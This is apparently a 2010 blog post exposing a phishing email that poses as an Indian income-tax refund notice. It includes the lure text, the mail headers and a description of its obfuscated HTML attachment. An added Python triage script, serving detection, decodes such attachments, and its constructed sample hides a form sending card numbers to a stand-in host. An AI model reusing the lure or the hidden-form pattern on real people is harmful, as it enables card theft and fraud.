Thursday, February 25, 2010

Phishers targeting Indian Income Tax Payers


Recently I got an email (claiming to be) from refund@incometaxindia.gov.in that went like this:

Dear Taxpayer,

After the last annual calculations of your fiscal activity we have determined that you are eligible to receive a tax refund of (INR) 13963.00 .

Please submit the tax refund request and allow us 6-9 days in order to process it.

A refund can be delayed for a variety of reasons.
For example submitting invalid records or applying after the deadline.

To access your tax refund, use the form attached to this email.


Regards,
Department of Revenue,Ministry of Finance,Government of India

It also had an attachment:

Content-Type: application/octet-stream; name=income tax refund request.html
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=income tax refund request.html

The attachment was 4 lines, 5 words and 26037 bytes in size, with CRLF newlines. The content of this HTML file was a small JavaScript doing a document.write(unescape('.... a large escaped string ....')), and it displayed like the attached image, except for the following missing line at the bottom of the page in the image.

Note: For security reasons, we recommend that you close your browser after you have finished the refund process.
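
One way to see what such an attachment hides without opening it in a browser, as an added example that is not part of the original post: it decodes every MIME part, undoes the document.write(unescape(...)) wrapper statically, and lists the form targets and field names in the result. The sample message, collector.example and the card_number field are constructed stand-ins, not values from the real mail.

```python
import base64
import re
from email import message_from_string
from html.parser import HTMLParser

ESCAPED = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")
WRAPPER = re.compile(r"document\.write\(\s*unescape\(\s*(['\"])(.*?)\1\s*\)\s*\)", re.S)

def js_unescape(s):
    """Static equivalent of JavaScript unescape(): %XX and %uXXXX to characters."""
    return ESCAPED.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)

class FormFinder(HTMLParser):
    """Collects form targets and input field names from decoded markup."""
    def __init__(self):
        super().__init__()
        self.actions, self.fields = [], []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append(a.get("action", ""))
        elif tag == "input" and a.get("name"):
            self.fields.append(a["name"])

def triage(raw_message):
    """Decode every MIME part and report what any unescape() wrapper hides."""
    finder = FormFinder()
    for part in message_from_string(raw_message).walk():
        body = part.get_payload(decode=True)  # None for multipart containers
        if body is None:
            continue
        # Scan content, not filenames: the unquoted name with spaces parses unreliably.
        for m in WRAPPER.finditer(body.decode("latin-1")):
            finder.feed(js_unescape(m.group(2)))
    return finder.actions, finder.fields

# Constructed sample: a small stand-in for the 26 KB attachment, same MIME headers.
HIDDEN = '<form action="http://collector.example/post.php"><input name="card_number"></form>'
SCRIPT = "<script>document.write(unescape('%s'))</script>" % "".join("%%%02X" % ord(c) for c in HIDDEN)
SAMPLE = (
    "Mime-Version: 1.0\n"
    'Content-Type: multipart/mixed; boundary="b1"\n\n'
    "--b1\nContent-Type: text/plain\n\nDear Taxpayer,\n"
    "--b1\nContent-Type: application/octet-stream; name=income tax refund request.html\n"
    "Content-Transfer-Encoding: base64\n"
    "Content-Disposition: attachment; filename=income tax refund request.html\n\n"
    + base64.b64encode(SCRIPT.encode()).decode() + "\n--b1--\n"
)

if __name__ == "__main__":
    print(triage(SAMPLE))
```

A form action pointing anywhere other than the claimed sender's own domain is the thing to look for in the output.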

Here are the headers of the mail.

From: "refund@incometaxindia.gov.in" <refund@incometaxindia.gov.in>
To: undisclosed-recipients:;
Cc:
Subject: Refund income tax department
Date: Wed, 24 Feb 2010 11:48:07 -0500
Return-Path: <refund@incometaxindia.gov.in>
Delivered-To: email-id-blocked
Received: (qmail 16162 invoked by uid 0); 24 Feb 2010 17:00:24 -0000
X-Ob-Received: from unknown (192.168.9.134) by mta45-1.us4.outblaze.com; 24 Feb 2010 17:00:24 -0000
Received: from wernerusa.com (adsl-072-151-071-244.sip.clt.bellsouth.net [72.151.71.244]) by spf5-1.us4.outblaze.com (Postfix) with ESMTP id 7993F63D29 for <email-id-blocked>; Wed, 24 Feb 2010 17:00:23 +0000 (GMT)
Received: from User ([67.227.173.160]) by wernerusa.com with Microsoft SMTPSVC(6.0.3790.3959); Wed, 24 Feb 2010 11:48:10 -0500
Reply-To: <refund@incometaxindia.gov.in>
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_NextPart_000_0105_01C2A9A6.2ADAE3C4"
X-Priority: 3
X-Msmail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-Mimeole: Produced By Microsoft MimeOLE V6.00.2600.0000
Message-Id: <NTSERVERFkuutSgcOrB00003500@wernerusa.com>
X-Originalarrivaltime: 24 Feb 2010 16:48:10.0571 (UTC) FILETIME=[25ED21B0:01CAB571]
Content-Type: text/plain; charset=Windows-1251
Content-Transfer-Encoding: 7bit